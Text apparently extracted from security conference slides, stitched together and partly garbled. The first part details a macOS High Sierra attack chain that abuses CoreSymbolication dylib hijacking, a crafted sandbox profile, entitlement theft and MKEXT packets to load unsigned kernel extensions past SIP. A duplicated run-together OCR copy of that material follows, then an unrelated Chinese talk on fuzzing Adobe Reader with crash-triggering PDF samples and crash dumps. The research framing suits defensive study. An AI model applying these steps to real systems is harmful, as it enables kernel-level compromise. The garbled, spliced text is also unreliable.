Secure Kernel Extension Loading: even a validly signed kernel extension still requires user approval to load. It is managed by the user space daemon syspolicyd, not XNU; the rules are stored in a SQLite database; the database is protected by rootless, so even root permission is insufficient to modify it:
sudo file /var/db/SystemPolicyConfiguration/KextPolicy
/var/db/SystemPolicyConfiguration/ExecPolicy: SQLite 3.x database, last written using SQLite version 3024000
sudo xattr /var/db/SystemPolicyConfiguration/ (shows com.apple.rootless)
sudo sqlite3 /var/db/SystemPolicyConfiguration/KextPolicy
SQLite version 3.24.0 2018-06-04 14:10:15
Enter ".help" for usage hints.
sqlite> .tables
kext_load_history_v3 kext_policy_mdm kext_policy settings
sqlite> .header on
sqlite> select * from kext_policy;
team_id|bundle_id|allowed|developer_name|flags
9PTGMPNXZ2|com.symantec.kext.SymAPComm|1|Symantec|8
9PTGMPNXZ2|com.symantec.kext.ndcengine|1|Symantec|8
9PTGMPNXZ2|com.symantec.kext.internetSecurity|1|Symantec|8
9PTGMPNXZ2|com.symantec.kext.ips|1|Symantec|8
Z3L495V9L4|com.intel.kext.intelhaxm|1|Intel Corporation Apps|1
VB5E2TV963|org.virtualbox.kext.VBoxDrv|1|Oracle America,Inc.|1

Relevant Objective-C interfaces (slide):
@interface KextManagerPolicy : NSObject
-(BOOL)canLoadKernelExtensionAtURL:(id)url isCacheLoad:(BOOL)cache;
@end
@interface SPKernelExtensionPolicy : NSObject
-(char)canLoadKernelExtension:(id)ext error:(NSError*)err;
-(char)canLoadKernelExtensionInCache:(id)ext error:(NSError*)err;
@end
kextd asks syspolicyd over XPC, which prompts, rejects or passes based on the SQLite database rules.

SKEL bypass: to bypass, pick any one of the following: code execution in a rootless-entitled process, then modify the KextPolicy database; get the task port of syspolicyd and patch -[KextManagerPolicy canLoadKernelExtensionAtURL:isCacheLoad:]; get the task port of kextd and patch -[SPKernelExtensionPolicy canLoadKernelExtensionInCache:error:].

A logic kernel attack surface: neither the signature nor the file permission is checked by the kernel; it accepts kext_request as long as the user space process has the com.apple.rootless.kext-secure-management entitlement; the user space processes kextd/kextutil/kextload are responsible for performing the signature and other validation. Once you own the entitlement, you rule the kernel; or you can try to obtain a task port for those entitled processes (which are still protected by SIP).

Part 02 Hijack the Entitlement

DLL hijacking on Windows: trick the target application into loading a malicious library, abusing the DLL search order or runtime loading (LoadLibrary); DLL hijacking of a trusted application to bypass the UAC prompt. Is there anything similar on macOS? Dylib hijacking: use dylib hijacking to steal an entitlement from Apple-signed binaries. Known techniques: LC_LOAD_WEAK_DYLIB and relative rpath (https:/ , link truncated in extraction); dlopen; NSBundle.principalClass (dlopen internally); CFBundleLoadExecutable (dlopen internally); CFBundleLoadExecutableAndReturnError (dlopen internally).

Crash report excerpt (slide):
VM Regions Near 0xdeadbf57:
--> __TEXT 0000000108bb05000 4K r-x/rwx SM=COW /tmp/*
Application Specific Information:
dyld2 mode
Thread 0 Crashed:: Dispatch queue: com.apple.main-thread
0 libsystem_c.dylib 0x00007fff5da2859c flockfile + 18
1 libsystem_c.dylib 0x00007fff5da2b570 fwrite + 66
2 test 0x0000000108b04f82 main + 82
3 libdyld.dylib 0x00007fff5d9a43d5 start + 1
Thread 0 crashed with X86 Thread State (64-bit):
rax: 0x00000001171ee66c rbx: 0x00000000deadbeef rcx: 0x00000001171ee66c rdx: 0x0000000000000001

Symbolication: the bug. The CoreSymbolication framework provides private APIs for symbolicating and other diagnostic information (/System/Library/PrivateFrameworks/CoreSymbolication.framework). Under certain circumstances it will try to load a dynamic library from a controllable path: when trying to demangle Swift symbols, in CoreSymbolication!call_external_demangle(char const*). More specifically, it tries to load a Swift runtime library, libswiftDemangle.dylib. Decompiled excerpt as extracted from the slide (decompiler output, kept as shown):
handle=_dlopen(/System/Library/PrivateFrameworks/Swift/libswiftDemangle.dylib,1);
if(handle=0)&(len=get_path_relative_to_framework_contents(././Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/libswiftDemangle.dylib,alternative_path,0x400),len=0|(handle=_dlopen(alternative_path,1),handle=0)&(len2=get_path_relative_to_framework_contents(././usr/lib/libswiftDemangle.dylib,alternative_path,0x400),len2=0|(handle=_dlopen(alternative_path,1),handle=0)
handle_xcselect=_dlopen(/usr/lib/libxcselect.dylib,1);
if(handle_xcselect=0)goto cleanup;
p_get_dev_dir_path=(undefined*)_dlsym(handle_xcselect,xcselect_get_developer_dir_path);
if(p_get_dev_dir_path=(undefined*)0x0)|(cVar2=(*(code*)p_get_dev_dir_path)(alternative_path,0x400,&local_42b,&local_42a,&local_429),cVar2=0)handle=0;
else _strlcat(alternative_path,/Toolchains/XcodeDefault.xctoolchain/usr/lib/libswiftDemangle.dylib,0x400);handle=_dlopen(alternative_path,1);
_dlclose(handle_xcselect);
if(handle=0)goto cleanup;
_ZL25demanglerLibraryFunctions.0=_dlsym(handle,swift_demangle_getSimplifiedDemangledName);
This is an insecure dlopen (dylib hijack).

Disassembly of xcselect.dylib!xcselect_get_developer_dir_path (slide):
00001287 lea rdi, s_DEVELOPER_DIR_000025b9 ; = "DEVELOPER_DIR"
0000128e call _stubs:_getenv ; char* _getenv(char* param_1)
00001293 mov r14, rax
00001296 test r14, r14
00001299 jz env_not_set
0000129b mov r13, rbx
0000129e mov rdi, r14
000012a1 mov rsi, r12
000012a4 mov ebx, dword ptr [local_440 + rbp]
000012aa mov edx, ebx
000012ac mov rcx, r15
000012af call _xcselect_find_developer_contents_from_path ; undefined _xcselect_find_develop...
000012b4 test found, found
000012b6 jz LAB_000013a6
000012bc mov rdi, r12
000012bf mov rsi, r14
000012c2 call _stubs:_strcmp ; int _strcmp(char* param_1, char...
000012c7 test found, found
000012c9 jz LAB_000013bb
000012cf lea rdi, s_DEVELOPER_DIR_000025b9 ; = "DEVELOPER_DIR"
000012d6 mov edx, 0x1
000012db mov rsi, r12
000012de call _stubs:_setenv ; int _setenv(char* param_1, char...

Triggering the bug: the file /System/Library/PrivateFrameworks/Swift/libswiftDemangle.dylib actually exists on High Sierra. To force it to load our payload, apply a custom sandbox profile before spawning the entitled binary (using the system's own shield against it), as extracted from the slide:
(version 1)
(allow default)
(deny file-read* (literal /System/Library/PrivateFrameworks/Swift/libswiftDemangle.dylib) (literal /Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/libswiftDemangle.dylib) (literal /usr/lib/libswiftDemangle.dylib))

Find an entitled host: the binary must have the special entitlement we need and have at least one code path that triggers the dylib hijacking. A magical entitlement: com.apple.system-task-ports, with which the process can attach to any other process (even restricted ones) and gain arbitrary entitlements. com.apple.SamplingTools: ls /usr/bin/ shows filtercalltree, heap32, stringdups32, leaks32, heap, atos, vmmap32, sample, malloc_history32, symbols, vmmap, leaks, stringdups, malloc_history (/usr/bin/atos, /usr/bin/leaks32, /usr/bin/stringdups32, /usr/bin/filtercalltree, /usr/bin/malloc_history, /usr/bin/symbols, /usr/bin/heap, /usr/bin/malloc_history32, /usr/bin/vmmap, /usr/bin/heap32, /usr/bin/sample, /usr/bin/vmmap32, /usr/bin/leaks, /usr/bin/stringdups). Example: vmmap Finder reports Process: Finder [245], Path: /System/Library/CoreServices/Finder.app/Contents/MacOS/Finder, Load Address: 0x107205000, Identifier: com.apple.finder. com.apple.SamplingTools: "There are several graphical applications and command-line tools available for gathering performance metrics." (https:/ , link truncated in extraction). These have a SIP exception and are entitled to debug any process, including restricted ones: jtool -ent $(which vmmap) shows com.apple.system-task-ports.

Scenario: the function task_for_pid requires the same euid, so we cannot inject a privileged process for escalation; a root process is still restricted because of System Integrity Protection; inject com.apple.rootless.* entitled processes to bypass rootless. For example, the com.apple.rootless.install.heritable entitlement can access restricted files, and the entitlement is inherited by its child processes.

Triggering the bug: the target app is written in Swift; use symbols to inspect the target app; use the -printDemangling flag to trigger the dylib hijack: symbols <pid> -printDemangling. Backtrace (slide):
12 libdyld.dylib 0x00007fff5178ad86 dlopen + 86
13 com.apple.CoreSymbolication 0x00007fff3d800332 invocation function for block in call_external_demangle(char const*) + 348
14 libdispatch.dylib 0x00007fff5174fe08 _dispatch_client_callout + 8
15 libdispatch.dylib 0x00007fff5174fdbb dispatch_once_f + 41
16 com.apple.CoreSymbolication 0x00007fff3d7a380f demangle + 298
17 com.apple.CoreSymbolication 0x00007fff3d7a35e3 TRawSymbol<Pointer64>::name() + 75
18 com.apple.CoreSymbolication 0x00007fff3d7a888e CSSymbolGetName + 166
19 symbols 0x000000010ffc386a 0x10ffb7000 + 51306
20 symbols 0x000000010ffc3cbe 0x10ffb7000 + 52414
21 com.apple.CoreSymbolication 0x00007fff3d7eba37 TRawSymbolOwnerData<Pointer64>::symbols_in_address_range(CSCppSymbolOwner*, TRange, void (_CSTypeRef) block_pointer) + 127
22 symbols 0x000000010ffc3c8e 0x10ffb7000 + 52366
23 com.apple.CoreSymbolication 0x00007fff3d7eb890 TRawSymbolOwnerData<Pointer64>::regions_in_address_range(CSCppSymbolOwner*, TRange, void (_CSTypeRef) block_pointer) + 124
24 symbols 0x000000010ffc3b6f 0x (text truncated here in the source)

102、zLAB_000013bb 000012cf leardi,s_DEVELOPER_DIR_000025b9 ;=DEVELOPER_DIR000012d6 movedx,0 x1000012db movrsi,r12000012de call_stubs:_setenv;int _setenv(char*param_1,charxcselect.dylib!xcselect_get_developer_dir_pathTrigging the bug This file/System/Library/PrivateFrameworks/Swift/libswiftDemangle.dylib

103、 actually exists on High Sierra To force it to load our payload,apply a custom sandbox profile before spawning the entitled binary以子之盾 攻子之盾(version 1)(allow default)(deny file-read*(literal/System/Library/PrivateFrameworks/Swift/libswiftDemangle.dylib)(literal/Developer/Toolchains/XcodeDefault.xctoo

104、lchain/usr/lib/libswiftDemangle.dylib)(literal/usr/lib/libswiftDemangle.dylib)Find an entitled host The binary must have special entitlement that we need have at least one code path to trigger dylib hijacking A magical entitlement com.apple.system-task-ports,with whom the process can attach to any o

105、ther processes(even those restricted),and gain arbitrary entitlementcom.apple.SamplingTools ls/usr/bin/filtercalltree,heap32,stringdups32,leaks32,heap,atos,vmmap32,sample,malloc_history32,symbols,vmmap,leaks,stringdups,malloc_history/usr/bin/atos/usr/bin/leaks32/usr/bin/stringdups32/usr/bin/filterca

106、lltree/usr/bin/malloc_history/usr/bin/symbols/usr/bin/heap/usr/bin/malloc_history32/usr/bin/vmmap/usr/bin/heap32/usr/bin/sample/usr/bin/vmmap32/usr/bin/leaks/usr/bin/stringdups vmmap FinderProcess:Finder 245Path:/System/Library/CoreServices/Finder.app/Contents/MacOS/FinderLoad Address:0 x107205000Id

107、entifier:com.apple.findercom.apple.SamplingTools There are several graphical applications and command-line tools available for gathering performance metrics.https:/ SIP exception,entitled to debug any process,including restricted jtool-ent which vmmapcom.apple.system-task-portsScenario Function task

108、_for_pid requires same euid,so we can not inject a privileged process for escalation A root process is still restricted because of System Integrity Protection Inject com.apple.rootless.*entitled processes to bypass rootless For example,com.apple.rootless.install.heritable entitlement can access rest

109、ricted files,and the entitlement is inherited by its child processesTriggering the bug Target app is written in Swift Use symbols to inspect the target app Use-printDemangling flag to trigger dylib hijack symbols pid-printDemangling12libdyld.dylib0 x00007fff5178ad86 dlopen+8613com.apple.CoreSymbolic

110、ation0 x00007fff3d800332 invocation function for block in call_external_demangle(char const*)+34814libdispatch.dylib0 x00007fff5174fe08 _dispatch_client_callout+815libdispatch.dylib0 x00007fff5174fdbb dispatch_once_f+4116com.apple.CoreSymbolication0 x00007fff3d7a380f demangle+29817com.apple.CoreSymb

111、olication0 x00007fff3d7a35e3 TRawSymbol:name()+7518com.apple.CoreSymbolication0 x00007fff3d7a888e CSSymbolGetName+16619symbols 0 x000000010ffc386a 0 x10ffb7000+5130620symbols 0 x000000010ffc3cbe 0 x10ffb7000+5241421com.apple.CoreSymbolication0 x00007fff3d7eba37 TRawSymbolOwnerData:symbols_in_address

112、_range(CSCppSymbolOwner*,TRange,void(_CSTypeRef)block_pointer)+12722symbols 0 x000000010ffc3c8e 0 x10ffb7000+5236623com.apple.CoreSymbolication0 x00007fff3d7eb890 TRawSymbolOwnerData:regions_in_address_range(CSCppSymbolOwner*,TRange,void(_CSTypeRef)block_pointer)+12424symbols 0 x000000010ffc3b6f 0 x

113、10ffb7000+5207925com.apple.CoreSymbolication0 x00007fff3d7c6c6a CSSymbolOwnerForeachSegment+9226symbols 0 x000000010ffc3af2 0 x10ffb7000+5195427com.apple.CoreSymbolication0 x00007fff3d7adbee CSSymbolicatorForeachSymbolOwnerAtTime+9528symbols 0 x000000010ffc25b1 0 x10ffb7000+4651329symbols 0 x0000000

114、10ffc00ee 0 x10ffb7000+37102Problem:Library Validation Library Validation is a protection that prohibits a process to load dynamic libraries without a digital signature issued by same team id SamplingTools on High Sierra are signed with Library Validation flag,which prohibits loading modules that ar

115、e not signed by AppleSystem Integrity Protection:enabledCrashed Thread:0Dispatch queue:com.apple.main-threadException Type:EXC_BAD_ACCESS(Code Signature Invalid)Exception Codes:0 x0000000000000032,0 x000000010d745000Exception Note:EXC_CORPSE_NOTIFYTermination Reason:Namespace CODESIGNING,Code 0 x2ke

116、rnel messages:External Modification Warnings:Process used task_for_pid().VM Regions Near 0 x10d745000:MALLOC_LARGE000000010d70ad745000 236K rw-/rwx SM=PRV-mapped file000000010dd746000 4K r-x/r-x SM=PRVObject_id=2929ab85mapped file000000010dd762000 104K r-

117、/r-SM=ALIObject_id=2af85085Application Specific Information:dyld:in dlopen()/var/folders/4d/1_vz_55x0mn_w1cyjwr9w42c0000gn/T/tmp.0b5SeUjh/Toolchains/XcodeDefault.xctoolchain/usr/lib/libswiftDemangle.dylib12 libdyld.dylib 0 x00007fff66c9fd86 dlopen+8613 com.apple.CoreSymbolication 0 x00007fff52d15332

118、 invocation function for block in call_external_demangle(char const*)+34814 libdispatch.dylib 0 x00007fff66c64e08 _dispatch_client_callout+815 libdispatch.dylib 0 x00007fff66c64dbb dispatch_once_f+4116 com.apple.CoreSymbolication 0 x00007fff52cb880f demangle+29817 com.apple.CoreSymbolication 0 x0000

119、7fff52cb85e3 TRawSymbol:name()+7518 com.apple.CoreSymbolication 0 x00007fff52cbd88e CSSymbolGetName+166“Im old,not obsolete”High SierraEl Capitanbin codesign-dvvv symbolsIdentifier=com.apple.SamplingToolsFormat=Mach-O thin(x86_64)CodeDirectory v=20100 size=812 flags=0 x0(none)hashes=32+5 location=em

120、beddedPlatform identifier=1Hash type=sha1 size=20bin codesign-dvvv symbolsIdentifier=com.apple.SamplingToolsFormat=Mach-O thin(x86_64)CodeDirectory v=20100 size=1384 flags=0 x2000(library-validation)hashes=36+5 location=embeddedPlatform identifier=4Hash type=sha256 size=32An old binary grabbed from

121、previous OS X does not have this flag!Exploit Craft the Toolchains/XcodeDefault.xctoolchain/usr/lib/libswiftDemangle.dylib Invoke sandbox_init_with_parameters to drop access to the legit swift libraries Set the DEVELOPER_DIR environment variable to redirect access to our payload Copy the symbols bin

122、ary from El Capitan and spawn the process Payload libswiftDemangle.dylib will be loaded in to the entitled process,who can task_for_pid for restricted processes and obtain arbitrary entitlementrootlessSIP bypassProtectedResourcesEntitledProcessOther ProcessessandboxSampling ToolsEvil dylibLegit dyli

123、battachPART 03To the KernelRule the Kernel Kickstart mach service com.apple.KernelExtensionServer(/usr/libexec/kextd)Get the task port to hijack the entitlements of kextd Since kextd is not library validation protected,just use the old school dylib injection Directly ask kernel to load the extension

124、 Plan A:Use kext_request to send a manually crafted MKEXT packet Plan B:Patch the user space checks,then call IOKit!OSKextLoadWithOptions to compose the packetKernel Code Execution without actually touching XNUXNUkextdkerneluserspaceOther ProcessessandboxSampling ToolsEvil dylibLegit dylibkext_reque

125、stattach0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF00000000 4d 4b 58 54 4d 4f 53 58 00 01 96 61 12 d4 f8 feMKXTMOSX.a.00000010 02 00 20 01 00 00 00 01 01 00 00 07 00 00 00 03.00000020 00 01 8e a4 00 00 00 00 00 00 07 bd 00 00 00 00.00000030 00 01 8e 70 cf fa ed fe 07 00 00 01 03 00 00 00.p.0000

126、0040 0b 00 00 00 08 00 00 00 a8 03 00 00 85 00 00 00.00000050 00 00 00 00 19 00 00 00 38 01 00 00 5f 5f 54 45.8._TE00000060 58 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00XT.00018ea0 00 00 00 00 3c 64 69 63 74 3e 3c 6b 65 79 3e 4b .K00018eb0 65 78 74 20 52 65 71 75 65 73 74 20 50 72 65 64 ext Reques

127、t Pred00018ec0 69 63 61 74 65 3c 2f 6b 65 79 3e 3c 73 74 72 69 icateLoad00018ee0 3c 6b 65 79 3e 4b 65 78 74 20 52 65 71 75 65 73 Kext Reques00018ef0 74 20 41 72 67 75 6d 65 6e 74 73 3c 2f 6b 65 79 t ArgumentsStar.00019640 44 52 45 46 3d 22 32 22 2f 3e 3c 2f 64 69 63 74 DREF=2/00019660 00 .MKEXT Pack

128、etmkext2_headermkext2_file_entryplistmkext2_file_entry#define MKEXT_MAGIC 0 x4D4B5854/*MKXT*/#define MKEXT_SIGN0 x4D4F5358/*MOSX*/typedef struct mkext2_header/#define MKEXT_HEADER_COREuint32_tmagic;/always MKXTuint32_tsignature;/always MOSXuint32_tlength;/the length of the whole fileuint32_tadler32;

129、/checksum from&version to end of fileuint32_tversion;/a vers style valueuint32_tnumkexts;/how many kexts are in the archivecpu_type_tcputype;/same as Mach-Ocpu_subtype_t cpusubtype;/same as Mach-Ouint32_t plist_offset;uint32_t plist_compressed_size;uint32_t plist_full_size;mkext2_header;typedef stru

130、ct mkext2_file_entry uint32_tcompressed_size;/if zero,file is not compresseduint32_tfull_size;/full size of data w/o this structuint8_tdata0;/data is inline to this struct mkext2_file_entry;The Kill-Switch KEXT Validations Code Signature KEXT Staging SKELrootless_check_trusted_classOSKextIsAuthentic

131、-SPKernelExtensionPolicy canLoadKernelExtensionInCache:errorcsr_checkLoad completely unsigned kext on macOS 10.13.6(17G65)(chained with CVE-2019-8565 Apple Feedback Assistant local root privilege escalation)PoC You can grab the source code herehttps:/ 04Patch and MitigationThe(unintended?)patch The

132、buggy code has been removed.It only loads a hard-coded path now Released in the Developer Preview of macOS Mojave,before I noticed the bug on High Sierra.Looks more like code refactoring than a security fixvoid _ZL22call_external_demanglePKc_block_invoke(void)char*bDoNotDemangleSwift;void*handle;bDo

133、NotDemangleSwift=_getenv(CS_DO_NOT_DEMANGLE_SWIFT);if(bDoNotDemangleSwift=NULL)|(byte)(*bDoNotDemangleSwift-0 x30U)(ulong)(byte)(*bDoNotDemangleSwift-0 x30U)&0 x1f)&1)!=0)handle=_dlopen(/System/Library/PrivateFrameworks/Swift/libswiftDemangle.dylib,1);if(handle!=0)_ZL25demanglerLibraryFunctions.0=_d

134、lsym(handle,swift_demangle_getSimplifiedDemangledName);return;Wait,theres another bug But actually theres another dylib hijacking that still present on macOS Mojave 10.14.2 Directly triggered without any sandbox or environment string trick sudo fs_usage|grep swift10:29:53stat64/Applications/IINA.app

135、/Contents/Frameworks/libswiftRemoteMirror.dylib0.000020 stringdups10:29:53stat64/Applications/IINA.app/Contents/Frameworks/libswiftRemoteMirrorLegacy.dylib0.000010 stringdups10:29:53stat64/Applications/IINA.app/Contents/libswiftRemoteMirror.dylib0.000010 stringdups10:29:53stat64/Applications/IINA.ap

136、p/Contents/libswiftRemoteMirrorLegacy.dylib0.000008 stringdups10:29:53stat64/Applications/IINA.app/Contents/Resources/libswiftRemoteMirrorLegacy.dylib0.000017 stringdups10:29:53stat64/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/libswiftDemangle.dylib0.001133 stringdups stringdups IINAProce

137、ss:IINA 99806Path:/Applications/IINA.app/Contents/MacOS/IINALoad Address:0 x10a422000Identifier:com.colliderli.iinaBOOL _cdecl-VMUObjectIdentifier _dlopenLibSwiftRemoteMirrorFromDir:(VMUObjectIdentifier*self,SEL a2,NSString*directory)if(!directory)return NO;if(!self-_libSwiftRemoteMirrorHandle)handl

138、e=dlopen(NSString stringWithFormat:%/libswiftRemoteMirror.dylib,directory UTF8String,RTLD_LAZY);.if(!self-_libSwiftRemoteMirrorLegacyHandle)handle=dlopen(NSString stringWithFormat:%/libswiftRemoteMirrorLegacy.dylib,directory UTF8String,RTLD_LAZY);.Another dylib Hijack Bug location:/System/Library/Pr

139、ivateFrameworks/Symbolication.framework-VMUObjectIdentifier _dlopenLibSwiftRemoteMirrorFromDir:Triggered when gathering Swift runtime information with these commands heap pid stringdups pidMitigation The variant doesnt work anymore on macOS Mojave Hardened Runtime has been applied The old SamplingTo

140、ols binary copied from El Capitan will be enforced to have library validation,even they are signed without that flag Only the binaries entitled with com.apple.security.cs.disable-library-validation can bypass com.apple.SamplingTools have been renamed to have their unique identifiers(.apple.SamplingT

141、ools.vmmap),and have a new entitlement com.apple.system-task-ports.safeThanksCodeColorist2 0 1 8源于2014年的思路2014年5月29日,我们发现了一个古天乐般平平无奇的IE漏洞(CVE-2014-1792)POC非常简单 72字节的Use-After-Free漏洞 启发 一开始无法重现 反复试验后发现拖拽文件入浏览器可触发UAF在mshtml!CDragDropManager:DragOver+0 x1f9 Fuzzer确实有乱发送鼠标键盘事件的模块 复盘发现情况,寻找原因 结论:不知道咋找到的(

142、摊手)类似的还有CVE-2014-1791等 有交互的漏洞似乎符合我们的期望 小众,难找,难重现 Fuzz效率低,性价比堪忧,鲜有人做 没有现成工具,一切需要从头搭建 能找到各种搞不清楚原因的漏洞结论与立项原因 简单的说 以前我们关注触发的内容,现在我们尝试触发的姿势 有交互要处理,没有交互制造交互也要处理 收集会引起交互的PDF元素 JS command 引起错误及安全等级相关的元素 发送会引起交互的事件 JS层面 用户输入层面 模拟用户响应思路 app.execMenuItem(xx);76 actions:GoToPage,FitPage,TwoColumns app.alert(xx)

143、console.show();this.mailDoc(true);this.mailForm(true);this.print(xx)this.saveAs(xx)this.insertPages(xx)app.launchURL(xx)引起交互的JS引起一些交互引起一些可以被Adobe Reader容忍的错误 无效的参数 不存在的对象 安全等级警告 引起一些错误引起一些错误 键盘事件 随机字符输入:圆周率映射到字符 快捷键与快捷键组合:Ctrl+H,Ctrl+L,Alt+F4 鼠标事件 鼠标移动:mouse_event()点击与拖拽:左键,右键,鼠标压下,鼠标放起 滚轮事件:滚动方向,点击

144、 系统事件与其它用户输入层面 不同的提示信息对话框 不同的按钮,确定/取消/是/否 需要输入的对话框 页面跳转:跳转到有效页面,跳转到无效页面,取消跳转 标签与选项选择:单选框,复选框,确认/应用/取消 翻页与缩放 其它动作 全屏、打印:允许/不允许,取消,记住选择 关闭应用程序:正常退出,强制退出,取消退出进一步细分 输入随机,但可以记录随机种子来回放 记录系统环境(内存、显示设置等)记录应用程序初始与结束配置(窗口大小等)记录输入时间间隔 记录虚拟机与物理机负载 记录网络响应情况可靠重现的条件 生成混合有各种因素的PDF样本 打开后根据对话框情况模拟用户响应 没有交互时制造一些交互事件 后

145、台对每次响应与主动事件进行记录 等待并观察一段时间,看是否有crash 重复第一步整合在一起 气宗 从头开始构造文件 通过JS构造页面及页面元素 剑宗 找个模板替换掉JS 其它不知道什么宗 Dummy fuzzing然后我们谈谈样本生成 敝厂特拉维夫分厂有人在做气宗的活 我们对PDF文件格式吃得不是很透(谦虚脸)黑哥对气剑宗的屁话一直耿耿于怀 黑哥对气剑宗的屁话一直耿耿于怀 黑哥对气剑宗的屁话一直耿耿于怀我们向剑宗低了头爬收集JS API素材 文档不全的用枚举来搜索一次(见下一页)佛系Fuzzing构建function obj(o)for(i in o)console.println(oi);

146、obj(this);爬收集JS API素材 文档不全的用枚举来搜索一次从基础文件中搜集objects名佛系Fuzzing构建6 0 obj endobj7 0 obj endobj8 0 obj endobj21 0 obj/FT/Ch /Parent 10 0 R/Ff 1545433046/T(mydata1)/Type/Annot/Subtype/Ink/Rect 50 320 100 345/BS/H/P/AP /AA 16 0 R endobj“Text”,”BigRect”,”SmallRect”,”mydata1”爬收集JS API素材 文档不全的用枚举来搜索一次(见下一页)从基

147、础文件中搜集objects名混合起来生成适合基础文件的JS语句佛系Fuzzing构建JS语句库this.getField()对象库“mydata1”this.getField(“mydata1)JS语句库.setFocus()this.getField(“mydata1).setFocus();爬收集JS API素材 文档不全的用枚举来搜索一次从基础文件中搜集objects名混合起来生成适合基础文件的JS语句替换/插入基础文件中的JS语句佛系Fuzzing构建1 0 obj/Type/Catalog/Pages 2 0 R/OCProperties/OCGs 6 0 R 7 0 R 8 0 R

148、/D/AcroForm 10 0 R/OpenAction 40 0 R endobj40 0 obj endobj%JS program to exexute41 0 obj streamapp.alert(hmm,nice day!);endstreamendobj1 0 obj/Type/Catalog/Pages 2 0 R/OCProperties/OCGs 6 0 R 7 0 R 8 0 R/D/AcroForm 10 0 R/OpenAction 40 0 R endobj40 0 obj endobj%JS program to exexute41 0 obj streamth

149、is.getField(“mydata1).setFocus();endstreamendobj爬收集JS API素材文档不全的用枚举来搜索一次从基础文件中搜集objects名混合起来生成适合基础文件的JS语句替换/插入基础文件中的JS语句佛系Fuzzing构建Mutools是个好工具!Adobe Reader会自己升级 将前一页的步骤都自动化 通过网络共享获取基础文件 通过网络共享保存结果 自动化精简工具 GPG精简后的样本和调试信息佛系Fuzzing构建我们有五台二手服务器!我们运行了四十个虚拟机!我们都四年没升级过机器了!中间还坏/换了一块RAID卡大规模跑 点掉第一个错误信息后等待.p

150、df 稍微往下滚动鼠标.pdf 选择双页视图后滚动鼠标到第三页.pdf 确认掉前三个错误信息后跳转到第一页.pdf结果是我们找到了些需要交互的%PDF-1.61 0 obj/Pages 2 0 R/OCProperties /AcroForm 10 0 R/OpenAction 40 0 R40 0 obj 41 0 obj streamtryapp.execMenuItem(SinglePage);catch(e)endstream2 0 obj 3 0 obj/Resources /Annots 11 0 R 21 0 R 42 0 R4 0 obj streamendstream10 0

151、 obj 11 0 obj 21 0 obj 42 0 obj 14 0 obj 15 0 obj trailer Patched Sample 1(10a0.1cfc):Access violation-code c0000005(!second chance!)eax=002ad788 ebx=3cb181b8 ecx=4b3c8f38 edx=3d6fcfe8 esi=69007bfc edi=4b3c8f38eip=681cd408 esp=002ad760 ebp=002ad760 iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=00

152、23 es=0023 fs=003b gs=0000 efl=00010246AcroRd32_68010000!PDAlternatesGetCosObj+0 x54f78:681cd408 8b11 mov edx,dword ptr ecx ds:0023:4b3c8f38=?1:009!heap-p-a ecx address 4b3c8f38 found in _DPH_HEAP_ROOT 3a1000 in free-ed allocation(DPH_HEAP_BLOCK:VirtAddr VirtSize)55a21ccc:4b3c8000 2000 6f6a90b2 veri

153、fier!VerifierDisableFaultInjectionExclusionRange+0 x00003162 77ba69cc ntdll!RtlpNtMakeTemporaryKey+0 x000048b1 77b69e07 ntdll!EtwSetMark+0 x0000eb7f 77b363a6 ntdll!wcsnicmp+0 x00000caa 763bc614 kernel32!HeapFree+0 x00000014 6de2ecfa MSVCR120!free+0 x0000001a 68307cdc AcroRd32_68010000!CTJPEGLibTermi

154、nate+0 x00014b7c 68307a45 AcroRd32_68010000!CTJPEGLibTerminate+0 x000148e5 6818ef98 AcroRd32_68010000!PDAlternatesGetCosObj+0 x00016b08 6818a74b AcroRd32_68010000!PDAlternatesGetCosObj+0 x000122bb 6818a36e AcroRd32_68010000!PDAlternatesGetCosObj+0 x00011edePatched Sample 1%PDF-1.2 1 0 obj/Pages 2 0

155、R/OCProperties/D /OpenAction 40 0 R 40 0 obj/S/JavaScript/JS(app.alert(click to trigger the crash);%endobj 2 0 obj 3 0 obj/MediaBox 0 0 400 550/Resources/Annots 11 0 R 21 0 R 42 0 R endobj 11 0 objendobj 14 0 objendobj 15 0 objendobj trailer Patched Sample 2(1a40.840):Access violation-code c0000005(

156、first chance)First chance exceptions are reported before any exception handling.This exception may be expected and handled.ACROFORM!DllUnregisterServer+0 x107759:55bbdc02 ff734c push dword ptr ebx+4Ch ds:002b:3f07cf0c=?0:000:x86 kvChildEBP RetAddr Args to Child WARNING:Stack unwind information not a

157、vailable.Following frames may be wrong.002ceb00 55bcfec1 32172fa0 002ced48 55c049cf ACROFORM!DllUnregisterServer+0 x107759002ceb0c 55c049cf 00000001 00000001 bbd31539 ACROFORM!DllUnregisterServer+0 x119a18002ced48 55c004c2 56366bf8 c0010000 00000005 ACROFORM!DllUnregisterServer+0 x14e526002ced64 55b

158、f7d63 56366bf8 c0010000 00000005 ACROFORM!DllUnregisterServer+0 x14a019002ceeb4 5802429c 56366978 c0010000 00000005 ACROFORM!DllUnregisterServer+0 x1418ba002cef14 586d4f8b 00000000 00000000 173faef0 AcroRd32_57de0000!CTJPEGDecoderReadNextTile+0 x4fe0c002cef44 586d61fc 00000000 bb8de7b7 173faef0 Acro

159、Rd32_57de0000!AIDE:PixelPartInfo:operator=+0 x27a73b002cef90 5883b200 00000000 bb8de7f7 173faef0 AcroRd32_57de0000!AIDE:PixelPartInfo:operator=+0 x27b9ac002cefd0 57f732c8 00000000 bb8df843 00000000 AcroRd32_57de0000!ixVectorNextHit+0 x6a578002cf064 5883b653 00000000 bb8df897 00000000 AcroRd32_57de00

160、00!PDAlternatesGetCosObj+0 x2ae38002cf0b0 586d6f92 00000000 bb8df8df 215661b8 AcroRd32_57de0000!ixVectorNextHit+0 x6a9cb002cf0f8 5850ba83 00000000 00000000 002cf158 AcroRd32_57de0000!AIDE:PixelPartInfo:operator=+0 x27c742002cf108 55af0c8a 215661b8 c0010000 00000005 AcroRd32_57de0000!AIDE:PixelPartIn

